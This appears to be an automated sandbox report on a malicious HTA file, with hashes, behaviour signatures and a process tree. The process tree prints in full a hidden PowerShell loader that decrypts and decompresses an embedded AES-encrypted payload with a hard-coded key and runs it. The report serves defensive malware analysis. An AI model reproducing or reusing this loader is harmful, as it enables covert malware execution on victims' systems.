Resubmissions

21-01-2025 13:39

250121-qx27kswrck 10

21-01-2025 11:57

250121-n4kvrsskfv 10

21-01-2025 11:43

250121-nvpglaslfq 10

21-01-2025 11:26

250121-njtbea1qcp 10

Analysis

  • max time kernel
    122s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-01-2025 11:26

General

  • Target

    163.5.169.28/SCAN-atoletter5.hta

  • Size

    1.1MB

  • MD5

    415d6911c9a6e92b5d3f050668592357

  • SHA1

    3f5ddfb1475a25201e443c61e31382100e8ddbae

  • SHA256

    87b6bcaa19c9631310bb28100e1ed2c9f2b982fa5aaef48186da150d8d1c4ac3

  • SHA512

    6b322e26c4724efa648713c665d6eddc4f2191d9f3a7764076ae8fc8d5f13fd2301238e7aade65b49db71b0ecadd9333af42cfa7e98ae54b554a99eafc45a055

  • SSDEEP

    1536:zA8mj3XPCeaTTQT7L/1rTrZwsvCPA68WStimr/l1vcmafSIm+lIWFiWCK4vLwwlY:zA8mrfFITQTH/1rTrZ/CPArtQ

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\163.5.169.28\SCAN-atoletter5.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2128
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $yZFZU = 'AAAAAAAAAAAAAAAAAAAAABE/loWPunGVG3vSzIF+4gYYuSdi25LjA3R2sRH3ANApHSXuf8bMyC29pivChWpQUF5jwS5PApifdJjbv9vkn9DXSM/2JUYmdCYx5xVByfj6pJkMegF8zwFSo8ZK3if0l/4GDPyqshuCBy2VboNRKWl2p1X2wR5J/tGkqskOVoRV3QhNnczAnEf7CRFM1Is/fdf8XSHRubMBIegNiKhoMT1yK8XvCRkWspIFFLru1FAD1Tg8XS8hfxzJUo+IMPHy+J5oTh+lTZwOZakD7TqP4Xzzik8o63NllXciiYBuevivvXZZr+HcVIgajF1z3oX4UsK+7MGliiTTvOJi1VOFAs78fIyHSsOZILhUXxYy7eZCv6zcnay7/rblIpr37qEjWFrFTxJrDCWp9YtfLzZc7b92SprQ5byOTP7PWUhcfuxubcAZXSaei2P6+m8vsNlMODSdhRkDYjzzdvO4sxrk0K6z/maPnACOkYyHI31Y8T1dYS7bXlq67DvZCqMUKg0rsj57gecSAFYjJEjQWAKcsBsRFffl9H53XWNqeXBuKXZxxa0ynQYXAcFtg9xVpjNBjS2+dkWCgPzYxTbP2CyH+Rq++bYuh6VceUfqx+txd5dRFF66O86UOmD+UADlA493qnFc7E8MNauW7Xe2rE83WcmgDH2dlqTL08iguTVfV5/fdb2BOrX7G2jBgqdD5nYvk3+8CVRlLEshXPMD8nMvXD+kdwOoH2QrJshtBLc71bgjc9yTWJFCQU0kVOUCuFP6VmmNHo2lHZ5qqsXgvDfKKalBncPVo5+5vvLnNCMTeOItEFo/OuvVdc7dryTs3ZI5GPGkyiys6MpgGWIVfP9LPNm3mr6ZHiFETvBOcE0bJsJmPvPeL8rQGUGdZdZ1hbrIzo/8rBWelUO2l4N6Fvh2sSVcyxQeAGRdUNs0c7I+WzywCuWFVtVQyKA3uyPZP9DpQiy2D598sKkcFbMNZQ7wMpZKNLYqysKmEr4OwnHBYs4WhQCGPFPt2RkbwPLeqi25Qw==';$UmUBU = 'THVtZ1BydlRUVHNScG5hU0plckh1cmtOUHlBclZZblo=';$PaMSUA = New-Object 'System.Security.Cryptography.AesManaged';$PaMSUA.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PaMSUA.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PaMSUA.BlockSize = 128;$PaMSUA.KeySize = 256;$PaMSUA.Key = [System.Convert]::FromBase64String($UmUBU);$UiOuV = [System.Convert]::FromBase64String($yZFZU);$GvFGJiWe = $UiOuV[0..15];$PaMSUA.IV = $GvFGJiWe;$JMerDVEst = $PaMSUA.CreateDecryptor();$LmLcRliha = $JMerDVEst.TransformFinalBlock($UiOuV, 16, $UiOuV.Length - 16);$PaMSUA.Dispose();$nJoMQCa = New-Object System.IO.MemoryStream( , $LmLcRliha );$QIpvRfP = New-Object System.IO.MemoryStream;$sWecTZomO = New-Object System.IO.Compression.GzipStream $nJoMQCa, ([IO.Compression.CompressionMode]::Decompress);$sWecTZomO.CopyTo( $QIpvRfP );$sWecTZomO.Close();$nJoMQCa.Close();[byte[]] $XhBgIX = $QIpvRfP.ToArray();$oKWZi = [System.Text.Encoding]::UTF8.GetString($XhBgIX);$oKWZi | powershell - }
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2804
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c powershell.exe $yZFZU = 'AAAAAAAAAAAAAAAAAAAAABE/loWPunGVG3vSzIF+4gYYuSdi25LjA3R2sRH3ANApHSXuf8bMyC29pivChWpQUF5jwS5PApifdJjbv9vkn9DXSM/2JUYmdCYx5xVByfj6pJkMegF8zwFSo8ZK3if0l/4GDPyqshuCBy2VboNRKWl2p1X2wR5J/tGkqskOVoRV3QhNnczAnEf7CRFM1Is/fdf8XSHRubMBIegNiKhoMT1yK8XvCRkWspIFFLru1FAD1Tg8XS8hfxzJUo+IMPHy+J5oTh+lTZwOZakD7TqP4Xzzik8o63NllXciiYBuevivvXZZr+HcVIgajF1z3oX4UsK+7MGliiTTvOJi1VOFAs78fIyHSsOZILhUXxYy7eZCv6zcnay7/rblIpr37qEjWFrFTxJrDCWp9YtfLzZc7b92SprQ5byOTP7PWUhcfuxubcAZXSaei2P6+m8vsNlMODSdhRkDYjzzdvO4sxrk0K6z/maPnACOkYyHI31Y8T1dYS7bXlq67DvZCqMUKg0rsj57gecSAFYjJEjQWAKcsBsRFffl9H53XWNqeXBuKXZxxa0ynQYXAcFtg9xVpjNBjS2+dkWCgPzYxTbP2CyH+Rq++bYuh6VceUfqx+txd5dRFF66O86UOmD+UADlA493qnFc7E8MNauW7Xe2rE83WcmgDH2dlqTL08iguTVfV5/fdb2BOrX7G2jBgqdD5nYvk3+8CVRlLEshXPMD8nMvXD+kdwOoH2QrJshtBLc71bgjc9yTWJFCQU0kVOUCuFP6VmmNHo2lHZ5qqsXgvDfKKalBncPVo5+5vvLnNCMTeOItEFo/OuvVdc7dryTs3ZI5GPGkyiys6MpgGWIVfP9LPNm3mr6ZHiFETvBOcE0bJsJmPvPeL8rQGUGdZdZ1hbrIzo/8rBWelUO2l4N6Fvh2sSVcyxQeAGRdUNs0c7I+WzywCuWFVtVQyKA3uyPZP9DpQiy2D598sKkcFbMNZQ7wMpZKNLYqysKmEr4OwnHBYs4WhQCGPFPt2RkbwPLeqi25Qw==';$UmUBU = 'THVtZ1BydlRUVHNScG5hU0plckh1cmtOUHlBclZZblo=';$PaMSUA = New-Object 'System.Security.Cryptography.AesManaged';$PaMSUA.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PaMSUA.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PaMSUA.BlockSize = 128;$PaMSUA.KeySize = 256;$PaMSUA.Key = [System.Convert]::FromBase64String($UmUBU);$UiOuV = [System.Convert]::FromBase64String($yZFZU);$GvFGJiWe = $UiOuV[0..15];$PaMSUA.IV = $GvFGJiWe;$JMerDVEst = $PaMSUA.CreateDecryptor();$LmLcRliha = $JMerDVEst.TransformFinalBlock($UiOuV, 16, $UiOuV.Length - 16);$PaMSUA.Dispose();$nJoMQCa = New-Object System.IO.MemoryStream( , $LmLcRliha );$QIpvRfP = New-Object System.IO.MemoryStream;$sWecTZomO = New-Object System.IO.Compression.GzipStream $nJoMQCa, ([IO.Compression.CompressionMode]::Decompress);$sWecTZomO.CopyTo( $QIpvRfP );$sWecTZomO.Close();$nJoMQCa.Close();[byte[]] $XhBgIX = $QIpvRfP.ToArray();$oKWZi = [System.Text.Encoding]::UTF8.GetString($XhBgIX);$oKWZi | powershell -
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1708
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe $yZFZU = 'AAAAAAAAAAAAAAAAAAAAABE/loWPunGVG3vSzIF+4gYYuSdi25LjA3R2sRH3ANApHSXuf8bMyC29pivChWpQUF5jwS5PApifdJjbv9vkn9DXSM/2JUYmdCYx5xVByfj6pJkMegF8zwFSo8ZK3if0l/4GDPyqshuCBy2VboNRKWl2p1X2wR5J/tGkqskOVoRV3QhNnczAnEf7CRFM1Is/fdf8XSHRubMBIegNiKhoMT1yK8XvCRkWspIFFLru1FAD1Tg8XS8hfxzJUo+IMPHy+J5oTh+lTZwOZakD7TqP4Xzzik8o63NllXciiYBuevivvXZZr+HcVIgajF1z3oX4UsK+7MGliiTTvOJi1VOFAs78fIyHSsOZILhUXxYy7eZCv6zcnay7/rblIpr37qEjWFrFTxJrDCWp9YtfLzZc7b92SprQ5byOTP7PWUhcfuxubcAZXSaei2P6+m8vsNlMODSdhRkDYjzzdvO4sxrk0K6z/maPnACOkYyHI31Y8T1dYS7bXlq67DvZCqMUKg0rsj57gecSAFYjJEjQWAKcsBsRFffl9H53XWNqeXBuKXZxxa0ynQYXAcFtg9xVpjNBjS2+dkWCgPzYxTbP2CyH+Rq++bYuh6VceUfqx+txd5dRFF66O86UOmD+UADlA493qnFc7E8MNauW7Xe2rE83WcmgDH2dlqTL08iguTVfV5/fdb2BOrX7G2jBgqdD5nYvk3+8CVRlLEshXPMD8nMvXD+kdwOoH2QrJshtBLc71bgjc9yTWJFCQU0kVOUCuFP6VmmNHo2lHZ5qqsXgvDfKKalBncPVo5+5vvLnNCMTeOItEFo/OuvVdc7dryTs3ZI5GPGkyiys6MpgGWIVfP9LPNm3mr6ZHiFETvBOcE0bJsJmPvPeL8rQGUGdZdZ1hbrIzo/8rBWelUO2l4N6Fvh2sSVcyxQeAGRdUNs0c7I+WzywCuWFVtVQyKA3uyPZP9DpQiy2D598sKkcFbMNZQ7wMpZKNLYqysKmEr4OwnHBYs4WhQCGPFPt2RkbwPLeqi25Qw==';$UmUBU = 'THVtZ1BydlRUVHNScG5hU0plckh1cmtOUHlBclZZblo=';$PaMSUA = New-Object 'System.Security.Cryptography.AesManaged';$PaMSUA.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PaMSUA.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PaMSUA.BlockSize = 128;$PaMSUA.KeySize = 256;$PaMSUA.Key = [System.Convert]::FromBase64String($UmUBU);$UiOuV = [System.Convert]::FromBase64String($yZFZU);$GvFGJiWe = $UiOuV[0..15];$PaMSUA.IV = $GvFGJiWe;$JMerDVEst = $PaMSUA.CreateDecryptor();$LmLcRliha = $JMerDVEst.TransformFinalBlock($UiOuV, 16, $UiOuV.Length - 16);$PaMSUA.Dispose();$nJoMQCa = New-Object System.IO.MemoryStream( , $LmLcRliha );$QIpvRfP = New-Object System.IO.MemoryStream;$sWecTZomO = New-Object System.IO.Compression.GzipStream $nJoMQCa, ([IO.Compression.CompressionMode]::Decompress);$sWecTZomO.CopyTo( $QIpvRfP );$sWecTZomO.Close();$nJoMQCa.Close();[byte[]] $XhBgIX = $QIpvRfP.ToArray();$oKWZi = [System.Text.Encoding]::UTF8.GetString($XhBgIX);$oKWZi
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2616
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2716

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    042a562efdae93e903ec45315e74c13f

    SHA1

    cf4c6238b506a522013eef9a52cc4f4677a1ba84

    SHA256

    ee3d03e3448457a4e6000b2eb4a46bf2a71942455de117d59196a678cb6b65ea

    SHA512

    59af0ca6932de046682ddb31cc7a1367b98aa21c620d993efac972a98d86cf0423a13a7053f6a90eaecde21b9d70cda3678961db79beaffe38ae38df232a63d7

  • memory/2804-2-0x0000000002630000-0x0000000002670000-memory.dmp

    Filesize

    256KB